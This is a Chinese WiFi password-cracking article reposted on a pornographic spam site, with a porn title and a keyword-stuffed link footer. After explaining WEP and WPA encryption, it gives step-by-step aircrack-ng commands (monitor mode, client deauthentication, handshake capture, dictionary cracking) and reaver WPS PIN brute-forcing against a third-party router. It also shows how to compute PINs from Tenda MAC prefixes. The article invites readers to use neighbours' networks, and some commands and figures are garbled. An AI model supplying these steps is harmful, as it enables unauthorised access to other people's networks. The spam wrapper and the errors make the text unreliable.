看片91_日日综合_成人黄色短视频在线观看_91视频 - v11=Av_国产高潮失禁喷水爽到抽搐视频_天天都色视频

pin怎么破解wifi密碼(無(wú)線WiFi網(wǎng)絡(luò)的密碼破解攻防及原理詳解)

小編:餓狼 更新時(shí)間:2023-04-24 14:03

大家應(yīng)該都有過(guò)這樣的經(jīng)歷,就是感覺(jué)自己家的無(wú)線網(wǎng)怎么感覺(jué)好像變慢了,"是不是有人蹭我家網(wǎng)?""還有的時(shí)候咱們出門也想試圖蹭一下別人家的網(wǎng)",這里"蹭網(wǎng)"的前提是要破解對(duì)方的"無(wú)線密碼",那么這個(gè)"無(wú)線密碼"到底是否安全呢?其技術(shù)原理是如何的呢? 我們又應(yīng)該如何防范他人"蹭網(wǎng)"呢?

pin怎么破解wifi密碼(無(wú)線WiFi網(wǎng)絡(luò)的密碼破解攻防及原理詳解)

今天我們就以本篇文章內(nèi)容給大家梳理一下"無(wú)線WiFi網(wǎng)絡(luò)的密碼破解攻防及原理"!

一、 WiFi的加密方式

這里以無(wú)線路由器的WiFi加密方式講解。

目前無(wú)線路由器里帶有的加密模式主要有:WEP,WPA-PSK(TKIP),WPA2-PSK(AES)和WPA-PSK(TKIP)+WPA2-PSK(AES)。

1. WEP(有線等效加密)(很容易被破解)

WEP是WiredEquivalentPrivacy的簡(jiǎn)稱,802.11b標(biāo)準(zhǔn)里定義的一個(gè)用于無(wú)線局域網(wǎng)(WLAN)的安全性協(xié)議。WEP被用來(lái)提供和有線lan同級(jí)的安全性。LAN天生比WLAN安全,因?yàn)長(zhǎng)AN的物理結(jié)構(gòu)對(duì)其有所保護(hù),部分或全部網(wǎng)絡(luò)埋在建筑物里面也可以防止未授權(quán)的訪問(wèn)。經(jīng)由無(wú)線電波的WLAN沒(méi)有同樣的物理結(jié)構(gòu),因此容易受到攻擊、干擾。WEP的目標(biāo)就是通過(guò)對(duì)無(wú)線電波里的數(shù)據(jù)加密提供安全性,如同端-端發(fā)送一樣。WEP特性里使用了rsa數(shù)據(jù)安全性公司開(kāi)發(fā)的rc4prng算法。如果你的無(wú)線基站支持MAC過(guò)濾,推薦你連同WEP一起使用這個(gè)特性(MAC過(guò)濾比加密安全得多)。盡管從名字上看似乎是一個(gè)針對(duì)有線網(wǎng)絡(luò)的安全選項(xiàng),其實(shí)并不是這樣。

WEP標(biāo)準(zhǔn)在無(wú)線網(wǎng)絡(luò)的早期已經(jīng)創(chuàng)建,目標(biāo)是成為無(wú)線局域網(wǎng)WLAN的必要的安全防護(hù)層,但是WEP的表現(xiàn)無(wú)疑令人非常失望。它的根源在于設(shè)計(jì)上存在缺陷。在使用WEP的系統(tǒng)中,在無(wú)線網(wǎng)絡(luò)中傳輸?shù)臄?shù)據(jù)是使用一個(gè)隨機(jī)產(chǎn)生的密鑰來(lái)加密的。但是,WEP用來(lái)產(chǎn)生這些密鑰的方法很快就被發(fā)現(xiàn)具有可預(yù)測(cè)性,這樣對(duì)于潛在的入侵者來(lái)說(shuō),就可以很容易的截取和破解這些密鑰。即使是一個(gè)中等技術(shù)水平的無(wú)線黑客也可以在兩到三分鐘內(nèi)迅速的破解WEP加密。

IEEE802.11的動(dòng)態(tài)有線等效保密(WEP)模式是二十世紀(jì)九十年代后期設(shè)計(jì)的,當(dāng)時(shí)功能強(qiáng)大的加密技術(shù)作為有效的武器受到美國(guó)嚴(yán)格的出口限制。由于害怕強(qiáng)大的加密算法被破解,無(wú)線網(wǎng)絡(luò)產(chǎn)品是被被禁止出口的。僅僅兩年以后,動(dòng)態(tài)有線等效保密模式就被發(fā)現(xiàn)存在嚴(yán)重的缺點(diǎn)。但是二十世紀(jì)九十年代的錯(cuò)誤不應(yīng)該被當(dāng)著無(wú)線網(wǎng)絡(luò)安全或者IEEE802.11標(biāo)準(zhǔn)本身,無(wú)線網(wǎng)絡(luò)產(chǎn)業(yè)不能等待電氣電子工程師協(xié)會(huì)修訂標(biāo)準(zhǔn),因此他們推出了動(dòng)態(tài)密鑰完整性協(xié)議TKIP(動(dòng)態(tài)有線等效保密的補(bǔ)丁版本)。

盡管WEP已經(jīng)被證明是過(guò)時(shí)且低效的,但是今天在許多現(xiàn)代的無(wú)線訪問(wèn)點(diǎn)和無(wú)線路由器中,它依然被支持的加密模式。不僅如此,它依然是被個(gè)人或公司所使用的最多的加密方法之一。如果你正在使用WEP加密,如果你對(duì)你的網(wǎng)絡(luò)的安全性非常重視的話,那么以后盡可能的不要再使用WEP,因?yàn)槟钦娴牟皇呛馨踩?/p>

2. WPA-PSK(TKIP)(安全性較高,但是也可以被破解)

無(wú)線網(wǎng)絡(luò)最初采用的安全機(jī)制是WEP(有線等效加密),但是后來(lái)發(fā)現(xiàn)WEP是很不安全的,802.11組織開(kāi)始著手制定新的安全標(biāo)準(zhǔn),也就是后來(lái)的802.11i協(xié)議。但是標(biāo)準(zhǔn)的制定到最后的發(fā)布需要較長(zhǎng)的時(shí)間,而且考慮到消費(fèi)者不會(huì)因?yàn)闉榱司W(wǎng)絡(luò)的安全性而放棄原來(lái)的無(wú)線設(shè)備,因此Wi-Fi聯(lián)盟在標(biāo)準(zhǔn)推出之前,在802.11i草案的基礎(chǔ)上,制定了一種稱為WPA(Wi-FiProctedAccess)的安全機(jī)制,它使用TKIP(臨時(shí)密鑰完整性協(xié)議),它使用的加密算法還是WEP中使用的加密算法RC4,所以不需要修改原來(lái)無(wú)線設(shè)備的硬件,WPA針對(duì)WEP中存在的問(wèn)題:IV過(guò)短、密鑰管理過(guò)于簡(jiǎn)單、對(duì)消息完整性沒(méi)有有效的保護(hù),通過(guò)軟件升級(jí)的方法提高網(wǎng)絡(luò)的安全性。

WPA的出現(xiàn)給用戶提供了一個(gè)完整的認(rèn)證機(jī)制,AP根據(jù)用戶的認(rèn)證結(jié)果決定是否允許其接入無(wú)線網(wǎng)絡(luò)中;認(rèn)證成功后可以根據(jù)多種方式(傳輸數(shù)據(jù)包的多少、用戶接入網(wǎng)絡(luò)的時(shí)間等)動(dòng)態(tài)地改變每個(gè)接入用戶的加密密鑰。對(duì)用戶在無(wú)線中傳輸?shù)臄?shù)據(jù)包進(jìn)行MIC編碼,確保用戶數(shù)據(jù)不會(huì)被其他用戶更改。作為802.11i標(biāo)準(zhǔn)的子集,WPA的核心就是IEEE802.1x和TKIP(TemporalKeyIntegrityProtocol)。

WPA考慮到不同的用戶和不同的應(yīng)用安全需要,例如:企業(yè)用戶需要很高的安全保護(hù)(企業(yè)級(jí)),否則可能會(huì)泄露非常重要的商業(yè)機(jī)密;而家庭用戶往往只是使用網(wǎng)絡(luò)來(lái)瀏覽Internet、收發(fā)E-mail、打印和共享文件,這些用戶對(duì)安全的要求相對(duì)較低。為了滿足不同安全要求用戶的需要,WPA中規(guī)定了兩種應(yīng)用模式:企業(yè)模式,家庭模式(包括小型辦公室)。根據(jù)這兩種不同的應(yīng)用模式,WPA的認(rèn)證也分別有兩種不同的方式。

對(duì)于大型企業(yè)的應(yīng)用,常采用"802.1x+EAP"的方式,用戶提供認(rèn)證所需的憑證。但對(duì)于一些中小型的企業(yè)網(wǎng)絡(luò)或者家庭用戶,WPA也提供一種簡(jiǎn)化的模式,它不需要專門的認(rèn)證服務(wù)器。這種模式叫做"WPA預(yù)共享密鑰(WPA-PSK)",它僅要求在每個(gè)WLAN節(jié)點(diǎn)(AP、無(wú)線路由器、網(wǎng)卡等)預(yù)先輸入一個(gè)密鑰即可實(shí)現(xiàn)。這個(gè)密鑰僅僅用于認(rèn)證過(guò)程,而不用于傳輸數(shù)據(jù)的加密。數(shù)據(jù)加密的密鑰是在認(rèn)證成功后動(dòng)態(tài)生成,系統(tǒng)將保證"一戶一密",不存在像WEP那樣全網(wǎng)共享一個(gè)加密密鑰的情形,因此大大地提高了系統(tǒng)的安全性。

3. WPA2-PSK(AES)(安全性較高,破解難度有所增加)

在802.11i頒布之后,Wi-Fi聯(lián)盟推出了WPA2,它支持AES(高級(jí)加密算法),因此它需要新的硬件支持,它使用CCMP(計(jì)數(shù)器模式密碼塊鏈消息完整碼協(xié)議)。在WPA/WPA2中,PTK的生成依賴PMK,而PMK獲的有兩種方式,一個(gè)是PSK的形式就是預(yù)共享密鑰,在這種方式中PMK=PSK,而另一種方式中,需要認(rèn)證服務(wù)器和站點(diǎn)進(jìn)行協(xié)商來(lái)產(chǎn)生PMK。

IEEE802.11所制定的是技術(shù)性標(biāo)準(zhǔn),Wi-Fi聯(lián)盟所制定的是商業(yè)化標(biāo)準(zhǔn),而Wi-Fi所制定的商業(yè)化標(biāo)準(zhǔn)基本上也都符合IEEE所制定的技術(shù)性標(biāo)準(zhǔn)。WPA(Wi-FiProtectedAccess)事實(shí)上就是由Wi-Fi聯(lián)盟所制定的安全性標(biāo)準(zhǔn),這個(gè)商業(yè)化標(biāo)準(zhǔn)存在的目的就是為了要支持IEEE802.11i這個(gè)以技術(shù)為導(dǎo)向的安全性標(biāo)準(zhǔn)。而WPA2其實(shí)就是WPA的第二個(gè)版本。WPA之所以會(huì)出現(xiàn)兩個(gè)版本的原因就在于Wi-Fi聯(lián)盟的商業(yè)化運(yùn)作。

我們知道802.11i這個(gè)任務(wù)小組成立的目的就是為了打造一個(gè)更安全的無(wú)線局域網(wǎng),所以在加密項(xiàng)目里規(guī)范了兩個(gè)新的安全加密協(xié)定–TKIP與CCMP(有些無(wú)線網(wǎng)路設(shè)備中會(huì)以AES、AES-CCMP的字眼來(lái)取代CCMP)。其中TKIP雖然針對(duì)WEP的弱點(diǎn)作了重大的改良,但保留了RC4演算法和基本架構(gòu),言下之意,TKIP亦存在著RC4本身所隱含的弱點(diǎn)。因而802.11i再打造一個(gè)全新、安全性更強(qiáng)、更適合應(yīng)用在無(wú)線局域網(wǎng)環(huán)境的加密協(xié)定-CCMP。所以在CCMP就緒之前,TKIP就已經(jīng)完成了。但是要等到CCMP完成,再發(fā)布完整的IEEE802.11i標(biāo)準(zhǔn),可能尚需一段時(shí)日,而Wi-Fi聯(lián)盟為了要使得新的安全性標(biāo)準(zhǔn)能夠盡快被布署,以消弭使用者對(duì)無(wú)線局域網(wǎng)安全性的疑慮,進(jìn)而讓無(wú)線局域網(wǎng)的市場(chǎng)可以迅速擴(kuò)展開(kāi)來(lái),因而使用已經(jīng)完成TKIP的IEEE802.11i第三版草案(IEEE802.11idraft3)為基準(zhǔn),制定了WPA。而于IEEE完成并公布IEEE802.11i無(wú)線局域網(wǎng)安全標(biāo)準(zhǔn)后,Wi-Fi聯(lián)盟也隨即公布了WPA第2版(WPA2)。WPA=IEEE802.11idraft3=IEEE802.1X/EAP+WEP(選擇性項(xiàng)目)/TKIPWPA2=IEEE802.11i=IEEE802.1X/EAP+WEP(選擇性項(xiàng)目)/TKIP/CCMP

4. 還有最后一種加密模式就是WPA-PSK(TKIP)+WPA2-PSK(AES)

這是目前無(wú)線路由里最高的加密模式,目前這種加密模式因?yàn)榧嫒菪缘膯?wèn)題,還沒(méi)有被很多用戶所使用。目前最廣為使用的就是WPA-PSK(TKIP)和WPA2-PSK(AES)兩種加密模式。相信在經(jīng)過(guò)加密之后的無(wú)線網(wǎng)絡(luò),一定能夠讓我們的用戶安心放心的上網(wǎng)沖浪。所以此種方式安全性很高但是考慮到兼容性問(wèn)題,沒(méi)有得到廣泛使用。

二、針對(duì)WiFi網(wǎng)絡(luò)的密碼破解方法

1. 主流方法:

不需要技術(shù)的破解方法,利用手機(jī)端"WiFi萬(wàn)能鑰匙"等軟件蹭網(wǎng)。

在抓到客戶端與目標(biāo)WiFi的握手包后實(shí)施基于密碼字典的暴力破解,成功率取決于目標(biāo)WiFi的密碼強(qiáng)度、字典的大小或準(zhǔn)確度、實(shí)施爆破的機(jī)器運(yùn)算性能。

在開(kāi)啟了wps功能的WiFi,使用pin碼猜解的方法獲得WiFi密碼。

2. 原理:

WiFi萬(wàn)能鑰匙"類App的真正原理是,收集用戶手機(jī)上成功連接過(guò)的WiFi賬號(hào)和密碼,并上傳、存儲(chǔ)到App的服務(wù)器上,等到附近的蹭網(wǎng)者搜索到同一個(gè)網(wǎng)絡(luò)時(shí),該App就可以根據(jù)附近熱點(diǎn)的配置信息,從服務(wù)器上自動(dòng)匹配并取得相應(yīng)的密碼,通過(guò)數(shù)據(jù)流量發(fā)送到手機(jī)端,從而完成WiFi連網(wǎng)。

(1) 暴力破解的原理

普通的無(wú)線路由器,加密方法一般使用wpa 、wpa2或wep,wep因?yàn)樘话踩珮O易被破解在現(xiàn)行的無(wú)線路由器上已基本取消。所以我們搜索到的待破WiFi基本都是wpa或wpa2加密的。至于使用認(rèn)證服務(wù)器(如radius等)的wpa認(rèn)證在個(gè)人無(wú)線WiFi領(lǐng)域基本不可能,所以通常我們能搜索到的待破WiFi都是基于本地密碼的wpa或wpa2加密WiFi。

破解wpa和wpa2加密的WiFi網(wǎng)絡(luò)的基本原理通俗來(lái)講,我們需要先在無(wú)線網(wǎng)卡監(jiān)聽(tīng)模式下搜集目標(biāo)WiFi的信息,例如ssid(WiFi名稱)、BSSID(也就是目標(biāo)WiFi無(wú)線路由器的MAC)、已連接的客戶端mac、信號(hào)強(qiáng)度等信息。然后發(fā)送偽造的取消關(guān)聯(lián)的數(shù)據(jù)包迫使已連接到該WiFi的客戶端與WiFi斷開(kāi)連接,重點(diǎn)是,斷開(kāi)連接后,客戶端會(huì)重新嘗試發(fā)起連接到該WiFi網(wǎng)絡(luò),這時(shí)客戶端會(huì)發(fā)送一個(gè)帶有認(rèn)證密碼的數(shù)據(jù)包以便請(qǐng)求重新連入WiFi,這個(gè)包俗稱為握手包。這時(shí)我們的攻擊機(jī)利用攻擊程序和無(wú)線網(wǎng)卡監(jiān)聽(tīng)抓取到這個(gè)握手包,這個(gè)握手包里就含有WiFi密碼,但這個(gè)密碼當(dāng)然是經(jīng)過(guò)加密的,所以后續(xù)就需要我們使用攻擊程序調(diào)用密碼字典結(jié)合獲取到的BSSID、客戶端MAC等信息進(jìn)行運(yùn)算,不斷運(yùn)算字典中的每一個(gè)密碼,直到有一個(gè)密碼使用wpa算法能算出一個(gè)與抓到的握手包中一致的加密字串,這個(gè)就是目標(biāo)WiFi的密碼了。如果把字典里的每一個(gè)密碼都算過(guò)一遍仍然沒(méi)有一個(gè)與抓取到的握手包加密字串一致的,就破解失敗,退出,構(gòu)造新的字典再試。

(2) pin碼破解WiFi密碼

在早期的無(wú)線路由器上開(kāi)啟了wps功能,這個(gè)功能簡(jiǎn)單來(lái)講就是為了方便設(shè)備連接WiFi,不需要每次都繁瑣的輸入密碼而設(shè)立的一個(gè)8位的純數(shù)字字串,客戶端可以通過(guò)pin碼快速關(guān)聯(lián)路由器WiFi。wps這個(gè)功能的設(shè)計(jì)初衷是方便用戶連接WiFi,卻成為破解WiFi最有效的手段,因?yàn)?位純數(shù)字的pin碼,最多只有1億種可能的組合,而由于最后一位是前七位的校驗(yàn)和,所以只需要猜解前七位,猜解的可能組合數(shù)就只有一千萬(wàn)種了,又由于發(fā)送pin碼連接WiFi,pin碼前4位出錯(cuò)的返回報(bào)錯(cuò)內(nèi)容和后三位錯(cuò)誤的返回報(bào)錯(cuò)報(bào)文內(nèi)容不同,所以只需要先猜前四位,前四位對(duì)了再猜后面三位,都對(duì)了以后最后一位校驗(yàn)和自動(dòng)可算出來(lái),所以實(shí)際最多只需要猜解10000+1000種組合,一般我們2秒種嘗試一個(gè)pin碼,那么理論上最多花費(fèi)6個(gè)小時(shí)就一定可以猜解出目標(biāo)路由器的pin碼,進(jìn)而獲取到WiFi密碼。

需要說(shuō)明的是,盡管pin碼破解WiFi被認(rèn)為是最有效的WiFi破解手段,但在實(shí)際中不容易實(shí)現(xiàn),一是因?yàn)閜in碼不安全的問(wèn)題已廣泛的被無(wú)線路由器的生產(chǎn)廠商所重視,所以現(xiàn)今購(gòu)買的無(wú)線路由器基本都已經(jīng)取消了這個(gè)wps功能。二是在pin的過(guò)程中需要不斷的向目標(biāo)路由器發(fā)送pin碼進(jìn)行嘗試,對(duì)方路由器要返回響應(yīng)報(bào)文,有時(shí)因路由器本身不穩(wěn)定或路由器性能等問(wèn)題,路由器不知不覺(jué)就被我們pin死了,使得猜解不能繼續(xù)或路由器在接收到過(guò)多錯(cuò)誤的pin碼之后會(huì)自動(dòng)休息一段時(shí)間,期間不接收pin碼,這導(dǎo)致我們pin碼猜解的時(shí)間過(guò)長(zhǎng)而沒(méi)有意義。

三、破解過(guò)程實(shí)例講解

1. 準(zhǔn)備工具

筆記本

USB無(wú)線上網(wǎng)卡(必備)

kali系統(tǒng)

密碼字典

2. 第一種方法:暴力破解法

何為暴力破解呢,其實(shí)就是一個(gè)一個(gè)密碼去試,直到正確的密碼。

現(xiàn)在的wifi一般加密都是:

WEP(有線等效加密)——采用WEP64位或者128位數(shù)據(jù)加密。

WPA-PSK[TKIP]———采用預(yù)共享秘鑰的WI-FI保護(hù)訪問(wèn),采用WPA-PSK標(biāo)準(zhǔn)加密技術(shù),加密類型為TKIP。

WPA-PSK[TKIP]+WPA2-PSK[AES]———允許客戶端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。

3. 開(kāi)始實(shí)驗(yàn):

(1) 第一步

進(jìn)入kali在終端輸入如下

airmon-ng

列出網(wǎng)卡信息

(2) 第二步

輸入:

airmon-ng start wlan0

開(kāi)啟網(wǎng)卡監(jiān)控

可以使用ifconfig命令查看一下網(wǎng)卡信息:

ifconfig

可以看到網(wǎng)卡的名字已經(jīng)變了

(3) 第三步

airodump-ng wlan0mon

掃描wifi信號(hào)

這里我用自己家的wifi做實(shí)驗(yàn)

(4) 第四步

上圖可以看出

BSSID是50:3A:A0:33:B2:8C 信道(CH)是:2

輸入:

airodump-ng -w freedom -c 2 -–bssid 50:3A:A0:33:B2:8C wlan0mon –ignore-negative-one

抓去握手包

-c:指定信道

-w:指定抓去握手包的存放位置或者名字,freedom是一會(huì)抓去的握手包的名字

--bssid:指定路由器的MAC

(5) 第五步

再開(kāi)一個(gè)終端輸入命令:

aireplay-ng – -deatu 10 -a 路由器MAC -c 客戶機(jī)MAC wlan0mon – -ignore-negative-one

使用airplay-ng工具強(qiáng)制斷開(kāi)已經(jīng)連接到wifi的設(shè)備重新連接路由器,來(lái)進(jìn)行抓去數(shù)據(jù)包

–deatu:指定發(fā)送反認(rèn)證包的個(gè)數(shù),也可以使用-0(阿利伯?dāng)?shù)字0)來(lái)指定反認(rèn)證包的個(gè)數(shù)

-a:指定路由器的MAC

-c:指定客戶機(jī)的MAC

(6) 第六步

破解握手包

aircrack-ng -a -w dict freedom-*.cap

-a1:指定WEP加密方式

-a2:指定WPA-PSk加密方式

dict:字典的名字

freedom-*.cap:握手包

破解完成,成功與否靠強(qiáng)大的字典和運(yùn)氣了。

4. 第二種方法

(1) 第一步

Wash掃描開(kāi)啟WPS的網(wǎng)絡(luò)

wash -i wlan0mon [-C]

由于周圍沒(méi)有開(kāi)啟WPS功能的wifi,就會(huì)出現(xiàn)上圖那樣,這時(shí)不要急,因?yàn)橛行╇[藏了起來(lái),我們直接來(lái)。

用前面那個(gè)掃wifi的命令:

airodump-ng wlan0mon

看見(jiàn)小編圈起來(lái)的MAC沒(méi)有,選擇一個(gè)PWR的值的絕對(duì)值小于70的wifi破解

(2) 第二步

選擇一個(gè)路由器

我在這選擇的是名字為:FAST_F70E的wifi

就他了:E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E

然后命令如下:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv

E4:D3:32:7F:F7:0E 這個(gè)mac根據(jù)路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E

如圖上表示可以破解,開(kāi)啟了wps功能

出現(xiàn)上圖這樣,就表示不能破解換其他wifi破解吧孩子

這樣就表示破解出來(lái)了

注意事項(xiàng):

如果密碼被改了你知道他wifi的pin碼就用如下命令:reaver-i mon0 -b MAC -p PIN

pin碼有8位:所以就是10的8次方,要窮舉1000000000次

這樣pin也是有限制的,比如要被pin出的路由器必須得開(kāi)啟wps功能;貌似現(xiàn)在很多都是防pin路由器或300秒pin限制的。

有些路由pin碼可以通過(guò)計(jì)算得到:騰達(dá)和磊科的產(chǎn)品如果路由MAC地址是以"C83A35"或"00B00C"打頭那么可以直接計(jì)算出PIN值。

比如這個(gè):bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通過(guò)計(jì)算器將mac后6位換算成10進(jìn)制數(shù),得到5741080(pin碼的前7位),最多試10次或通過(guò)軟件得到該路由pin碼!

破解時(shí)推薦這個(gè)命令:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv

因?yàn)楱Cd9 –t9參數(shù)可以防止pin死路由器。

四、如何防止被蹭網(wǎng)

(1) 可以設(shè)置復(fù)雜密碼,密碼包含字符、符號(hào)和數(shù)字,長(zhǎng)度設(shè)置到12位以上,越復(fù)雜的無(wú)線密碼對(duì)方破解難度越大。加密方式選用WPA-PSK/WPA2-PSK加密方式。

(2) 隱藏自己的無(wú)線網(wǎng)絡(luò)名稱。

當(dāng)我們隱藏?zé)o線認(rèn)證之后,別人是無(wú)法找到我們的網(wǎng)絡(luò)連接點(diǎn),所以無(wú)法連接到我們的網(wǎng)絡(luò)。點(diǎn)擊路由器頁(yè)面左上角的無(wú)線基本設(shè)置。在右側(cè)可以看到有一個(gè)SSID服務(wù)廣播。把前面的勾打掉,點(diǎn)擊下面的保存。就可以隱藏?zé)o線信號(hào)

(3) 設(shè)置白名單,開(kāi)啟MAC地址過(guò)濾功能,手動(dòng)把自己家里上網(wǎng)設(shè)備的MAC地址添加進(jìn)來(lái),這時(shí)即使有人破解了WIFI密碼也無(wú)法上網(wǎng)。

主站蜘蛛池模板: 国产三级电影一区二区 | 久久久久久免费毛片精品 | 成人在线综合 | 欧美成人一区二区三区 | 国产一区二区在线观看免费视频 | 国产区精品在线观看 | 国产精品高潮在线观看 | 国产免费视屏 | 亚洲欧美一区二区三区 | 欧美福利一区二区 | 中文字幕不卡av | 一区二区三区中文字幕 | 国产黄在线观看 | 国产午夜精品久久久久久久 | 中文字幕高清在线 | 美女久久久久久久 | 亚洲第一视频网 | 爱爱免费视频 | 在线观看成人网 | 黄www在线观看 | 中文字幕精品久久一区二区三区 | 国产精品18久久久久久久久 | 久久精品9 | 黄色毛片在线 | 国产伦精品一区二区三区在线 | 成人欧美在线 | 欧美精品性生活 | 日产一二三四五六区传媒 | 亚洲精品三级 | www.狠狠撸.com| 精品国产91乱码一区二区三区 | 最近中文字幕高清字幕mv | 久久久久网站 | 特级毛片网站 | 亚洲免费在线视频 | 国产一卡久久电影永久 | 日本最新一区二区 | 国产精品综合一区二区 | 免费一区二区视频 | 在线视频日韩精品 | 国产热re99久久6国产精品 |